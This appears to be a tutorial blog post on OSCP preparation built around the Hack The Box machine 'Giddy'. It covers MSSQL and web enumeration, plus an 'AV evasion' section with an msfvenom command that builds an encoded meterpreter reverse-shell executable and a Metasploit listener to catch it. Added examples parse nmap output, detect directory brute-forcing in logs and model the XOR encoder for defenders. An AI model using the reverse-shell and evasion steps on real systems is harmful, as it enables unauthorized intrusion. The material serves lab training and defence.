Mastering MSSQL Enumeration and AV Evasion for OSCP Preparation


In the world of penetration testing, mastering MSSQL enumeration and AV evasion is crucial for success in exams like OSCP. The Hack The Box (HTB) machine “Giddy” is an excellent example of a challenge that tests these skills. To own the Giddy machine, you need to think outside the box, especially during the foothold phase.

Enumerating MSSQL

MSSQL enumeration is a critical skill for identifying vulnerabilities in databases. Here’s a quick guide to get started:

1. Nmap Scan for MSSQL Services

Use Nmap to identify MSSQL services running on the target:

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password <target_ip> 

2. Connecting to MSSQL

Use `sqsh` or `mssqlclient.py` from Impacket to connect to the database:

sqsh -S <target_ip> -U <username> -P <password> 

Or with Impacket:

mssqlclient.py <username>@<target_ip> -windows-auth 

3. Enumerating Databases and Tables

Once connected, enumerate databases and tables using SQL queries:

SELECT name FROM sys.databases; 
USE <database_name>; 
SELECT * FROM information_schema.tables; 
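Added example, not from the original post: the human-readable output of the two Nmap scripts used above can be parsed into a structured finding, so the server version and any login that accepts an empty password go straight into the report instead of being copied by hand. The sample output below is constructed (placeholder host name, IP, instance and version) and follows the line layout the `ms-sql-info` and `ms-sql-empty-password` scripts print; the key names the parser looks for are taken from that layout, so confirm them against a live run of your Nmap version.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample of what the two NSE scripts print. Host name, IP,
# instance and version values are placeholders, not taken from the Giddy box.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-info:
|   Windows server name: EXAMPLE-SQL01
|   10.0.0.5\\MSSQLSERVER:
|     Instance name: MSSQLSERVER
|     Version:
|       name: Microsoft SQL Server 2016 SP1
|       number: 13.00.4001.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: SP1
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| ms-sql-empty-password:
|   10.0.0.5\\MSSQLSERVER:
|_    sa:<empty> => Login Success
"""

EMPTY_LOGIN_RE = re.compile(r"^(\S+):<empty> => Login Success$")


@dataclass
class MssqlFinding:
    server_name: Optional[str] = None
    instance: Optional[str] = None
    version_name: Optional[str] = None
    version_number: Optional[str] = None
    tcp_port: Optional[int] = None
    post_sp_patched: Optional[bool] = None
    empty_password_logins: List[str] = field(default_factory=list)


def _strip_nse_prefix(raw: str) -> str:
    # NSE prefixes script lines with "| " or "|_"; drop the prefix and indentation.
    return re.sub(r"^\|_?", "", raw).strip()


def parse_mssql_scripts(output: str) -> MssqlFinding:
    finding = MssqlFinding()
    section = None
    for raw in output.splitlines():
        if not raw.startswith("|"):
            continue  # port table lines, not script output
        line = _strip_nse_prefix(raw)
        if line.startswith("ms-sql-info:"):
            section = "info"
            continue
        if line.startswith("ms-sql-empty-password:"):
            section = "empty-password"
            continue
        if section == "info":
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if key == "Windows server name":
                finding.server_name = value
            elif key == "Instance name":
                finding.instance = value
            elif key == "name":  # nested under "Version:"
                finding.version_name = value
            elif key == "number":
                finding.version_number = value
            elif key == "TCP port" and value.isdigit():
                finding.tcp_port = int(value)
            elif key == "Post-SP patches applied":
                finding.post_sp_patched = value.lower() == "true"
        elif section == "empty-password":
            m = EMPTY_LOGIN_RE.match(line)
            if m:
                finding.empty_password_logins.append(m.group(1))
    return finding


def risk_summary(finding: MssqlFinding) -> List[str]:
    """Turn the parsed facts into the items a report or hardening ticket needs."""
    issues = []
    for login in finding.empty_password_logins:
        issues.append(f"login '{login}' accepts an empty password")
    if finding.post_sp_patched is False:
        issues.append("no post-service-pack patches applied; check cumulative update level")
    return issues


if __name__ == "__main__":
    result = parse_mssql_scripts(SAMPLE_NMAP_OUTPUT)
    print(result)
    for issue in risk_summary(result):
        print("RISK:", issue)
```

Run it against saved Nmap output (`nmap -oN`) rather than the terminal; the normal-output file keeps the same `|`-prefixed layout the parser expects.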

Web Enumeration

Web enumeration is another key skill. Use tools like `gobuster` or `dirsearch` to discover hidden directories and files:

gobuster dir -u http://<target_ip> -w /path/to/wordlist.txt 
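The flip side of directory brute-forcing is how visible it is in the web server's logs: a wordlist run produces a burst of 404 responses from a single client within seconds. As an added example that is not from the original post, the Python below flags that pattern over constructed combined-log-format lines; the threshold and time window are assumed tuning values, and the User-Agent strings in the sample are placeholders (a scanner's UA is trivially changed, which is why the detection keys on status codes and timing instead).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

# Combined-log-format line: client IP, identity, user, timestamp, request, status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample: 10.0.0.9 walks a wordlist and collects 404s within a few
# seconds; 10.0.0.20 is an ordinary visitor with a single missing favicon.
SAMPLE_ACCESS_LOG: List[str] = [
    '10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 196 "-" "scanner/0.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "GET /backup HTTP/1.1" 404 196 "-" "scanner/0.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:37 +0000] "GET /cgi-bin HTTP/1.1" 404 196 "-" "scanner/0.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:37 +0000] "GET /config HTTP/1.1" 404 196 "-" "scanner/0.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:38 +0000] "GET /dev HTTP/1.1" 404 196 "-" "scanner/0.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:38 +0000] "GET /uploads HTTP/1.1" 404 196 "-" "scanner/0.0"',
    '10.0.0.20 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.20 - - [10/Oct/2023:13:56:03 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '10.0.0.20 - - [10/Oct/2023:13:56:05 +0000] "GET /about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]


def detect_dir_bruteforce(lines: Iterable[str], threshold: int = 5,
                          window_seconds: int = 60) -> Dict[str, int]:
    """Return {client_ip: total_404s} for clients that produced at least
    `threshold` 404s inside any `window_seconds` span.

    threshold and window_seconds are assumed starting values; tune them to the
    site's normal 404 rate before alerting on them.
    """
    misses = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("status") != "404":
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        misses[m.group("ip")].append(ts)

    window = timedelta(seconds=window_seconds)
    flagged: Dict[str, int] = {}
    for ip, stamps in misses.items():
        stamps.sort()
        # Sliding window: do `threshold` consecutive misses fit inside the window?
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                flagged[ip] = len(stamps)
                break
    return flagged


if __name__ == "__main__":
    for ip, count in detect_dir_bruteforce(SAMPLE_ACCESS_LOG).items():
        print(f"ALERT: {ip} produced {count} 404s in a short burst (possible directory brute-force)")
```

Feed it `access.log` lines via `detect_dir_bruteforce(open("access.log"))`; the same logic ports directly to a SIEM aggregation (count of 404 by client IP over a one-minute bucket).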

AV Evasion

AV evasion is often overlooked but is essential for gaining a final shell. A simple technique involves encoding payloads to bypass detection:

1. Generating an Encoded Payload

Use `msfvenom` to create an encoded payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -e x86/shikata_ga_nai -o shell.exe 

2. Setting Up a Listener

Start a Metasploit listener to catch the reverse shell:

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LHOST <your_ip> 
set LPORT 4444 
run 
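To see what the encoder in step 1 actually buys you, the following is an added educational model written for this page; it is not Metasploit's code and does not reproduce the real `shikata_ga_nai` decoder stub or key schedule. It implements the idea the encoder's name describes, an XOR additive-feedback scheme: each 32-bit word of the body is XORed with a running key, and the decoded word is added back into the key before the next word. The body bytes and keys are constructed stand-ins, not shellcode.

```python
import struct
from typing import List

MASK = 0xFFFFFFFF


def _dwords(data: bytes) -> List[int]:
    # A 32-bit decoder loop works on whole dwords, so pad the tail with zeros.
    padded = data + b"\x00" * (-len(data) % 4)
    return [struct.unpack_from("<I", padded, off)[0] for off in range(0, len(padded), 4)]


def xor_additive_encode(plain: bytes, key: int) -> bytes:
    """XOR each dword with a running key; the key then absorbs the plaintext dword."""
    out = bytearray()
    k = key & MASK
    for p in _dwords(plain):
        out += struct.pack("<I", p ^ k)
        k = (k + p) & MASK  # additive feedback on the decoded value
    return bytes(out)


def xor_additive_decode(cipher: bytes, key: int) -> bytes:
    """Inverse of the above: the work a decoder stub performs at run time."""
    out = bytearray()
    k = key & MASK
    for c in _dwords(cipher):
        p = c ^ k
        out += struct.pack("<I", p)
        k = (k + p) & MASK
    return bytes(out)


def round_trip_ok(plain: bytes, key: int) -> bool:
    """Decoding the encoded body with the same key must give back the original."""
    return xor_additive_decode(xor_additive_encode(plain, key), key)[: len(plain)] == plain


if __name__ == "__main__":
    # Constructed stand-in for a payload body; no real shellcode is involved.
    body = b"CONSTRUCTED-PAYLOAD-BODY-WITH-A-RECOGNISABLE-MARKER"
    for key in (0xDEADBEEF, 0x01234567):
        enc = xor_additive_encode(body, key)
        print(f"key={key:#010x} marker visible in encoded bytes: {b'MARKER' in enc}")
        print(f"key={key:#010x} round trip ok: {round_trip_ok(body, key)}")
```

The model makes the defensive point concrete: two keys yield two different byte strings, but the decode routine does not change and the decoded bytes are identical. Signature engines therefore match the stub rather than the body, and emulation or behavioural engines see the original payload once it unpacks. Encoding alone is rarely enough against current AV, so treat step 1 as a starting point and expect to combine it with other techniques.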

What Undercode Says

Mastering MSSQL enumeration and AV evasion is essential for any aspiring penetration tester, especially those preparing for the OSCP exam. The Giddy machine on Hack The Box is a perfect example of how these skills are applied in real-world scenarios.

To further enhance your skills, practice the following commands and techniques:

  • Linux Commands for Enumeration
    netstat -tuln # Check open ports
    ps aux # List running processes

  • Windows Commands for Privilege Escalation
    whoami /priv # Check user privileges
    systeminfo # Gather system information

  • Additional Resources
    For more advanced techniques, refer to the Hack The Box Academy and Offensive Security’s PEN-200 Course.

By combining these skills, you’ll be well-prepared to tackle challenges like Giddy and succeed in your OSCP journey. Keep practicing, and always think outside the box!
